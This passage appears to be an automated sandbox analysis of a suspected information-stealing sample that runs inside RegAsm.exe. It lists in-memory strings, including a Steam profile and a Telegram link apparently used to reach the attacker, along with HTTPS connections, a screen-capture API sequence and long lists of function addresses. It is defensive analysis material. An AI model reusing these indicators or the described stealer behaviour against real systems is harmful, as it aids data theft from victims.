Source: RegAsm.exe, 00000004.00000002.2403578458.0000000001401000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199658817715t
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	String found in binary or memory: https://steamcommunity.com/workshop/
Source: 76561199658817715[1].htm.4.dr	String found in binary or memory: https://store.steampowered.com/
Source: 76561199658817715[1].htm.4.dr	String found in binary or memory: https://store.steampowered.com/about/
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	String found in binary or memory: https://store.steampowered.com/explore/
Source: RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	String found in binary or memory: https://store.steampowered.com/legal/
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	String found in binary or memory: https://store.steampowered.com/mobile
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	String found in binary or memory: https://store.steampowered.com/news/
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	String found in binary or memory: https://store.steampowered.com/stats/
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: HDAFBAEBKJKFIDHJJKJKKFBAFB.4.dr	String found in binary or memory: https://support.mozilla.org
Source: HDAFBAEBKJKFIDHJJKJKKFBAFB.4.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: HDAFBAEBKJKFIDHJJKJKKFBAFB.4.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
Source: file.exe, 00000001.00000002.2121549788.0000000004315000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/sa9ok
Source: mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: GCAFCAFH.4.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: GCAFCAFH.4.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: HDAFBAEBKJKFIDHJJKJKKFBAFB.4.dr	String found in binary or memory: https://www.mozilla.org
Source: HDAFBAEBKJKFIDHJJKJKKFBAFB.4.dr	String found in binary or memory: https://www.mozilla.org#
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: HDAFBAEBKJKFIDHJJKJKKFBAFB.4.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/ost.exe
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: HDAFBAEBKJKFIDHJJKJKKFBAFB.4.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/xe
Source: HDAFBAEBKJKFIDHJJKJKKFBAFB.4.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701

Source: unknown	HTTPS traffic detected: 104.105.90.131:443 -> 192.168.2.6:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 78.46.229.36:443 -> 192.168.2.6:49701 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 4_2_0040FFD0 _EH_prolog,memset,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,

4_2_0040FFD0

System Summary

.NET source code contains very large array initializations

Source: file.exe, RemoteObjects.cs

Large array initialization: RemoteObjects: array initializer size 193536

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CC2B8C0 rand_s,NtQueryVirtualMemory,	4_2_6CC2B8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CC2B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	4_2_6CC2B910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CC2B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	4_2_6CC2B700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CBCF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	4_2_6CBCF280

Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_014D0EEF	1_2_014D0EEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0041B0A7	4_2_0041B0A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0041A47A	4_2_0041A47A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0041C5B0	4_2_0041C5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00423C74	4_2_00423C74
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00423C7C	4_2_00423C7C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00423CC0	4_2_00423CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00423CC4	4_2_00423CC4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00423CC8	4_2_00423CC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00423CCC	4_2_00423CCC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00423CD0	4_2_00423CD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00423CD4	4_2_00423CD4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00423CD8	4_2_00423CD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00423CDC	4_2_00423CDC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00423CE0	4_2_00423CE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00423CE4	4_2_00423CE4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00423CE8	4_2_00423CE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00423CEC	4_2_00423CEC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00423CF0	4_2_00423CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00423CF4	4_2_00423CF4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00423CA0	4_2_00423CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00423CA4	4_2_00423CA4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00423CA8	4_2_00423CA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00423CAC	4_2_00423CAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00423CB0	4_2_00423CB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00423CB4	4_2_00423CB4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00423CB8	4_2_00423CB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00423CBC	4_2_00423CBC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00423D5C	4_2_00423D5C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00423D60	4_2_00423D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00423D64	4_2_00423D64
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00423D68	4_2_00423D68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00423D6C	4_2_00423D6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00423D70	4_2_00423D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00423D74	4_2_00423D74
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00423D78	4_2_00423D78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00423D7C	4_2_00423D7C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00423D00	4_2_00423D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00423D04	4_2_00423D04
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00423D08	4_2_00423D08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00423D0C	4_2_00423D0C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00423D10	4_2_00423D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00423D14	4_2_00423D14
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00423D18	4_2_00423D18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00423D1C	4_2_00423D1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00423D20	4_2_00423D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00423D24	4_2_00423D24
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00423D30	4_2_00423D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00423D34	4_2_00423D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00423D80	4_2_00423D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00423D84	4_2_00423D84
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00423D88	4_2_00423D88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00423D8C	4_2_00423D8C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00423D9C	4_2_00423D9C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00423DA0	4_2_00423DA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00423C74	4_2_00423C74
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00423E70	4_2_00423E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00423E88	4_2_00423E88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00423EA4	4_2_00423EA4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00423EA8	4_2_00423EA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00423F40	4_2_00423F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00423F44	4_2_00423F44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00423F50	4_2_00423F50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00423F60	4_2_00423F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00423F64	4_2_00423F64
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00423F78	4_2_00423F78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00419F29	4_2_00419F29
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00423F88	4_2_00423F88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00423F9B	4_2_00423F9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CBC35A0	4_2_6CBC35A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CC06CF0	4_2_6CC06CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CBD6C80	4_2_6CBD6C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CC3AC00	4_2_6CC3AC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CC05C10	4_2_6CC05C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CC12C10	4_2_6CC12C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CC00DD0	4_2_6CC00DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CBEED10	4_2_6CBEED10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CBDFD00	4_2_6CBDFD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CBE5E90	4_2_6CBE5E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CBCBEF0	4_2_6CBCBEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CBDFEF0	4_2_6CBDFEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CC24EA0	4_2_6CC24EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CC12E4E	4_2_6CC12E4E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CC03E50	4_2_6CC03E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CC36E63	4_2_6CC36E63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CC07E10	4_2_6CC07E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CBE9E50	4_2_6CBE9E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CC29E30	4_2_6CC29E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CBF6FF0	4_2_6CBF6FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CBCDFE0	4_2_6CBCDFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CBD9F00	4_2_6CBD9F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CC058E0	4_2_6CC058E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CBD7810	4_2_6CBD7810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CC0B820	4_2_6CC0B820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CC14820	4_2_6CC14820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CBE8850	4_2_6CBE8850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CBED850	4_2_6CBED850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CBFD9B0	4_2_6CBFD9B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CBCC9A0	4_2_6CBCC9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CC22990	4_2_6CC22990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CC1B970	4_2_6CC1B970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CBDD960	4_2_6CBDD960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CBEA940	4_2_6CBEA940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CC08AC0	4_2_6CC08AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CBDCAB0	4_2_6CBDCAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CBF4AA0	4_2_6CBF4AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CBE1AF0	4_2_6CBE1AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CC3BA90	4_2_6CC3BA90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CC32AB0	4_2_6CC32AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CC09A60	4_2_6CC09A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CBCD4E0	4_2_6CBCD4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CC234A0	4_2_6CC234A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CC2C4A0	4_2_6CC2C4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CBED4D0	4_2_6CBED4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CBD64C0	4_2_6CBD64C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CC3545C	4_2_6CC3545C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CC3542B	4_2_6CC3542B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CBD5440	4_2_6CBD5440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CC285F0	4_2_6CC285F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CBF0512	4_2_6CBF0512
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CC376E3	4_2_6CC376E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CC2E680	4_2_6CC2E680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CC15600	4_2_6CC15600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CBCC670	4_2_6CBCC670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CBE4640	4_2_6CBE4640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CC177A0	4_2_6CC177A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CC07710	4_2_6CC07710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CC350C7	4_2_6CC350C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CBF60A0	4_2_6CBF60A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CBEC0E0	4_2_6CBEC0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CC0F070	4_2_6CC0F070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CC05190	4_2_6CC05190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CC3B170	4_2_6CC3B170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CBC22A0	4_2_6CBC22A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CC0E2F0	4_2_6CC0E2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CC353C8	4_2_6CC353C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CBCF380	4_2_6CBCF380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CBDC370	4_2_6CBDC370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CC0D320	4_2_6CC0D320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CBC5340	4_2_6CBC5340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CD2ECD0	4_2_6CD2ECD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CCCECC0	4_2_6CCCECC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CCDAC60	4_2_6CCDAC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CD96C00	4_2_6CD96C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6CDAAC30	4_2_6CDAAC30
